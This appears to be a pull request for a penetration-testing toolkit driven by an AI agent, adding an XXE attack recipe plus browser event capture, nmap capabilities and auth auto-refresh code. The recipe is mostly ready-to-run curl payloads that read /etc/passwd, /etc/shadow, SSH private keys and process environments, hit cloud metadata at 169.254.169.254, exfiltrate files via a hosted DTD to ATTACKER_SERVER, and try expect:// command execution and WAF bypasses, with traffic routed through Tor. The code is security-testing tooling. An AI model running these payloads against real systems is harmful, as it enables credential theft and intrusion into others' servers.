+## Prerequisites
+
+- Identified endpoint that parses XML
+- Attacker-controlled server for OOB exfiltration (or Burp Collaborator)
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Confirm XML parsing with a well-formed document
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><root><test>hello</test></root>' -o /tmp/xxe-baseline.txt && cat /tmp/xxe-baseline.txt"
+```
+
+### Step 2: Test basic internal entity declaration
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe \"XXE_CANARY\">]><root><test>&xxe;</test></root>' -o /tmp/xxe-basic.txt && cat /tmp/xxe-basic.txt"
+```
+
+If `XXE_CANARY` appears in the response, entity processing is enabled.
+
+### Step 3: Read local files with external entity
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root><test>&xxe;</test></root>' -o /tmp/xxe-passwd.txt && cat /tmp/xxe-passwd.txt"
+```
+
+For Windows targets:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><root><test>&xxe;</test></root>' -o /tmp/xxe-winini.txt && cat /tmp/xxe-winini.txt"
+```
+
+### Step 4: Test SSRF via XXE
+
+Probe internal services through the XML parser.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">]><root><test>&xxe;</test></root>' -o /tmp/xxe-ssrf.txt && cat /tmp/xxe-ssrf.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:8080/\">]><root><test>&xxe;</test></root>' -o /tmp/xxe-internal.txt && cat /tmp/xxe-internal.txt"
+```
+
+### Step 5: Out-of-band (OOB) exfiltration with parameter entities
+
+Use when the entity value is not reflected in the response.
+
+First, host a malicious DTD on your server (`ATTACKER_SERVER`):
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/xxe-oob.dtd << 'DTD'
+<!ENTITY % file SYSTEM \"file:///etc/hostname\">
+<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER_SERVER/?d=%file;'>\">
+%eval;
+%exfil;
+DTD
+echo 'DTD payload written to /tmp/xxe-oob.dtd -- host this on ATTACKER_SERVER'"
+```
+
+Then send the triggering payload:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % dtd SYSTEM \"http://ATTACKER_SERVER/xxe-oob.dtd\">%dtd;]><root><test>x</test></root>' -o /tmp/xxe-oob-resp.txt && cat /tmp/xxe-oob-resp.txt"
+```
+
+Check your server logs for the exfiltrated data in the query string.
+
+### Step 6: Error-based extraction
+
+Force XML parsing errors that include file contents in the error message.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % file SYSTEM \"file:///etc/hostname\"><!ENTITY % eval \"<!ENTITY &#x25; err SYSTEM \\\"file:///nonexistent/%file;\\\">\">%eval;%err;]><root>x</root>' -o /tmp/xxe-err.txt && cat /tmp/xxe-err.txt"
+```
+
+### Step 7: XXE via file upload (DOCX, XLSX, SVG)
+
+DOCX and XLSX are ZIP archives containing XML. Inject XXE into internal XML files.
+
+```bash
+pentest-kit exec bash -c "mkdir -p /tmp/xxe-docx && cat > /tmp/xxe-docx/\\[Content_Types\\].xml << 'XML'
+<?xml version=\"1.0\"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>
+<Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\">
+<Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/>
+<Default Extension=\"xml\" ContentType=\"application/xml\"/>
+<Override PartName=\"/word/document.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml\"/>
+</Types>
+XML
+echo 'Inject &xxe; into document.xml body, then repackage as .docx'"
+```
+
+SVG upload:
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/xxe.svg << 'SVG'
+<?xml version=\"1.0\"?>
+<!DOCTYPE svg [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>
+<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\">
+  <text x=\"0\" y=\"20\">&xxe;</text>
+</svg>
+SVG
+curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/xxe.svg;type=image/svg+xml' -o /tmp/xxe-svg-resp.txt && cat /tmp/xxe-svg-resp.txt"
+```
+
+### Step 8: Test with different protocols
+
+```bash
+pentest-kit exec bash -c "for PROTO in 'file:///etc/passwd' 'php://filter/convert.base64-encode/resource=/etc/passwd' 'expect://id' 'jar:http://ATTACKER_SERVER/evil.jar!/evil.txt'; do echo \"--- \$PROTO ---\"; curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d \"<?xml version=\\\"1.0\\\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \\\"\$PROTO\\\">]><root>&xxe;</root>\" 2>&1 | head -5; done"
+```
+
+### Step 9: Enumerate internal files systematically
+
+```bash
+pentest-kit exec bash -c "for FILE in /etc/passwd /etc/shadow /etc/hosts /proc/self/environ /proc/self/cmdline /home/*/.ssh/id_rsa /var/www/html/config.php; do echo \"--- \$FILE ---\"; RESP=\$(curl -sk '$TARGET/api/parse' -X POST -H 'Content-Type: application/xml' -d \"<?xml version=\\\"1.0\\\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \\\"file://\$FILE\\\">]><root>&xxe;</root>\"); echo \"\$RESP\" | head -5; done"
+```
+
+## Common pitfalls
+
+- **Multiline file content**: Standard entities cannot contain newlines from external files in some parsers. Use base64 encoding via `php://filter` or OOB exfiltration.
+- **DTD restrictions**: Some parsers block external DTD loading. Try internal subset only.
+- **WAF blocks DOCTYPE**: URL-encode or use UTF-8/UTF-16 BOM to bypass detection.
+- **JSON endpoint**: Try changing Content-Type from `application/json` to `application/xml`. Some frameworks auto-detect.
+- **Entity limits**: Parsers may limit entity expansion. Billion Laughs DoS is separate from data exfil.
+
+## Chain opportunities
+
+- **SSRF to cloud metadata**: XXE can reach 169.254.169.254 to steal cloud credentials (see cloud-metadata-ssrf pattern).
+- **File read to credential theft**: Read config files containing database passwords, API keys, or SSH keys.
+- **RCE via expect://**: PHP with `expect` extension allows command execution through XXE.
+- **Internal port scanning**: Use XXE SSRF to map internal network services.
+- **Denial of service**: Billion Laughs (entity expansion) for availability testing.

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -12,6 +12,9 @@ services:
     # --- Host isolation ---
     security_opt:
       - no-new-privileges:true      # can't escalate to HOST root
+    cap_add:
+      - NET_RAW                     # nmap raw sockets (SYN scan, ping)
+      - NET_ADMIN                   # nmap network interface operations
     ipc: shareable                  # isolated from host default namespace
 
     # NOTE: `pid: host` was removed here. Sharing the host's PID namespace made

--- a/tools/copilot/_browser.py
+++ b/tools/copilot/_browser.py
@@ -53,6 +53,7 @@ class BrowserState:
     screenshot_path: str | None = None
     error: str | None = None
     restarted: bool = False
+    events: dict = field(default_factory=dict)
 
     def to_dict(self) -> dict[str, Any]:
         d: dict[str, Any] = {"url": self.url}
@@ -70,6 +71,8 @@ class BrowserState:
             d["error"] = self.error
         if self.restarted:
             d["restarted"] = True
+        if self.events:
+            d["events"] = self.events
         return d
 
 
@@ -86,6 +89,12 @@ class BrowserWrapper:
     _context: Any = field(default=None, repr=False)
     _page: Any = field(default=None, repr=False)
     _started: bool = field(default=False, repr=False)
+
+    # Per-turn event captures — cleared before each action, included in response.
+    _dialogs: list = field(default_factory=list, repr=False)
+    _console_msgs: list = field(default_factory=list, repr=False)
+    _page_errors: list = field(default_factory=list, repr=False)
+    _response_errors: list = field(default_factory=list, repr=False)
 
     async def start(self) -> None:
         """Launch Chromium through mitmproxy. Idempotent."""
@@ -115,8 +124,69 @@ class BrowserWrapper:
         self._context.set_default_timeout(ACTION_TIMEOUT_MS)
         self._context.set_default_navigation_timeout(NAVIGATION_TIMEOUT_MS)
         self._page = await self._context.new_page()
+        self._attach_event_listeners(self._page)
         self._started = True
         logger.info("Chromium ready")
+
+    def _attach_event_listeners(self, page: Any) -> None:
+        """Wire Playwright event hooks for dialog/console/error/response capture."""
+
+        # Dialog (alert/confirm/prompt) — captures XSS verification.
+        async def _on_dialog(dialog: Any) -> None:
+            self._dialogs.append({
+                "type": dialog.type,
+                "message": dialog.message[:500],
+            })
+            logger.info("Dialog captured: [%s] %s", dialog.type, dialog.message[:100])
+            await dialog.dismiss()
+
+        page.on("dialog", _on_dialog)
+
+        # Console messages — CSP violations, stack traces, debug output.
+        def _on_console(msg: Any) -> None:
+            if msg.type in ("error", "warning"):
+                self._console_msgs.append({
+                    "type": msg.type,
+                    "text": str(msg.text)[:300],
+                })
+
+        page.on("console", _on_console)
+
+        # Uncaught JS exceptions — broken security middleware, auth bypass signals.
+        def _on_pageerror(error: Any) -> None:
+            self._page_errors.append(str(error)[:300])
+
+        page.on("pageerror", _on_pageerror)
+
+        # HTTP responses with errors — 500s, leaked headers, auth failures.
+        def _on_response(response: Any) -> None:
+            if response.status >= 400:
+                self._response_errors.append({
+                    "url": response.url[:200],
+                    "status": response.status,
+                })
+
+        page.on("response", _on_response)
+
+    def _clear_events(self) -> None:
+        """Clear per-turn event buffers before each action."""
+        self._dialogs.clear()
+        self._console_msgs.clear()
+        self._page_errors.clear()
+        self._response_errors.clear()
+
+    def _collect_events(self) -> dict[str, Any]:
+        """Return captured events for inclusion in the turn response."""
+        events: dict[str, Any] = {}
+        if self._dialogs:
+            events["dialogs"] = list(self._dialogs)
+        if self._console_msgs:
+            events["console_errors"] = list(self._console_msgs)
+        if self._page_errors:
+            events["page_errors"] = list(self._page_errors)
+        if self._response_errors:
+            events["response_errors"] = list(self._response_errors)[:10]  # cap
+        return events
 
     async def stop(self) -> None:
         """Close browser and Playwright."""
@@ -165,7 +235,10 @@ class BrowserWrapper:
         if take_screenshot:
             screenshot_path = await self._take_screenshot()
 
-        return BrowserState(url=url, dom=dom, screenshot_path=screenshot_path, restarted=restarted)
+        return BrowserState(
+            url=url, dom=dom, screenshot_path=screenshot_path,
+            restarted=restarted, events=self._collect_events(),
+        )
 
     async def _take_screenshot(self) -> str | None:
         """Save a screenshot and return the relative path."""
@@ -185,7 +258,8 @@ class BrowserWrapper:
     # ─── browser actions ────────────────────────────────────────────
 
     async def navigate(self, url: str) -> dict[str, Any]:
-        """Go to a URL and wait for network idle."""
+        """Go to a URL and wait for DOM content loaded."""
+        self._clear_events()
         page, restarted = await self._ensure_page()
         try:
             await page.goto(url, wait_until="domcontentloaded", timeout=NAVIGATION_TIMEOUT_MS)
@@ -198,6 +272,7 @@ class BrowserWrapper:
 
     async def click(self, selector: str) -> dict[str, Any]:
         """Click an element, optionally waiting for navigation."""
+        self._clear_events()
         page, restarted = await self._ensure_page()
         try:
             await page.click(selector, timeout=ACTION_TIMEOUT_MS)
@@ -211,6 +286,7 @@ class BrowserWrapper:
 
     async def fill(self, selector: str, value: str) -> dict[str, Any]:
         """Fill a form field."""
+        self._clear_events()
         page, restarted = await self._ensure_page()
         try:
             await page.fill(selector, value, timeout=ACTION_TIMEOUT_MS)
@@ -262,6 +338,7 @@ class BrowserWrapper:
 
     async def reload(self) -> dict[str, Any]:
         """Full page reload preserving session."""
+        self._clear_events()
         page, restarted = await self._ensure_page()
         try:
             await page.reload(wait_until="domcontentloaded", timeout=NAVIGATION_TIMEOUT_MS)

--- a/tools/copilot/loop.py
+++ b/tools/copilot/loop.py
@@ -283,6 +283,7 @@ class Dispatcher:
                 viewport={"width": 1280, "height": 720},
             )
             self.browser._page = await self.browser._context.new_page()  # noqa: SLF001
+            self.browser._attach_event_listeners(self.browser._page)  # noqa: SLF001
             return await self.browser.navigate(self.state.read().get("target", ""))
 
         future = asyncio.run_coroutine_threadsafe(_reload_context(), self.aio_loop)

--- a/tools/copilot/loop.py
+++ b/tools/copilot/loop.py
@@ -128,6 +128,11 @@ class Dispatcher:
         result["turn"] = self.turn
         result["timestamp"] = ts
 
+        # Include recent findings so the agent can reason about its own
+        # discoveries. Without this, the agent records findings via note
+        # but can't see them in subsequent turns — breaking chain reasoning.
+        result["recent_findings"] = self._get_recent_findings(5)
+
         # Log to transcript.
         self.transcript.append(
             turn=self.turn,
@@ -162,13 +167,36 @@ class Dispatcher:
             cookies = asyncio.run_coroutine_threadsafe(
                 self.browser.get_cookies(), self.aio_loop,
             ).result(timeout=5)
-            return run_http(
+            result = run_http(
                 method=args.get("method", "GET"),
                 url=args.get("url", ""),
                 headers=args.get("headers"),
                 body=args.get("body"),
                 session_cookies=cookies,
             )
+            # Auto-refresh auth on 401 — if we have auth.yaml, re-login
+            # and retry once instead of making the agent debug token expiry.
+            if result.get("status") == 401 and self.auth is not None:
+                current_role = self.state.read().get("current_role", "anonymous")
+                if current_role != "anonymous":
+                    logger.info("Got 401 — auto-refreshing auth for role %r", current_role)
+                    try:
+                        self._switch_role(current_role)
+                        cookies = asyncio.run_coroutine_threadsafe(
+                            self.browser.get_cookies(), self.aio_loop,
+                        ).result(timeout=5)
+                        result = run_http(
+                            method=args.get("method", "GET"),
+                            url=args.get("url", ""),
+                            headers=args.get("headers"),
+                            body=args.get("body"),
+                            session_cookies=cookies,
+                        )
+                        result["auth_refreshed"] = True
+                    except Exception as exc:  # noqa: BLE001
+                        logger.warning("Auth refresh failed: %s", exc)
+                        result["auth_refresh_failed"] = str(exc)
+            return result
 
         if primitive == "shell":
             argv = args.get("argv")
@@ -272,6 +300,28 @@ class Dispatcher:
             return 0
         with path.open() as f:
             return sum(1 for _ in f)
+
+    def _get_recent_findings(self, n: int) -> list[dict[str, Any]]:
+        """Return the last N findings from findings.ndjson for turn context."""
+        findings_path = self.copilot_dir / "findings.ndjson"
+        if not findings_path.exists():
+            return []
+        lines = findings_path.read_text().strip().split("\n")
+        tail = lines[-n:] if len(lines) > n else lines
+        result = []
+        for line in tail:
+            if line.strip():
+                try:
+                    entry = json.loads(line)
+                    # Include only key fields to avoid context flooding.
+                    result.append({
+                        "type": entry.get("type", ""),
+                        "title": entry.get("title", "")[:200],
+                        "severity": entry.get("severity"),
+                    })
+                except json.JSONDecodeError:
+                    pass
+        return result
 
     def _count_endpoints(self) -> int:
         ep_path = self.copilot_dir / "interceptor" / "endpoints.json"


### PR DESCRIPTION
All 10 must-fix items from issue #61.

## Code fixes (3 commits, ~134 LoC)
- Playwright event hooks: dialog, console, pageerror, response capture
- Findings included in every turn response (last 5)
- Nmap cap_add: NET_RAW + NET_ADMIN
- Auth auto-refresh on 401
- Event listeners attached after switch_role

## Docs (1 commit, ~2,643 lines)
- SKILL.md: hypothesis-driven reasoning loop replaces linear checklist
- 20 pattern recipe files in patterns/

## Test plan
- [ ] Rebuild Docker image
- [ ] Dialog capture: navigate to page with alert(), verify events.dialogs in response
- [ ] Nmap: `pentest-kit exec nmap -sV target` works without permission error
- [ ] Findings feedback: send note, verify recent_findings in next turn
- [ ] Auth refresh: let token expire, verify auto re-login on 401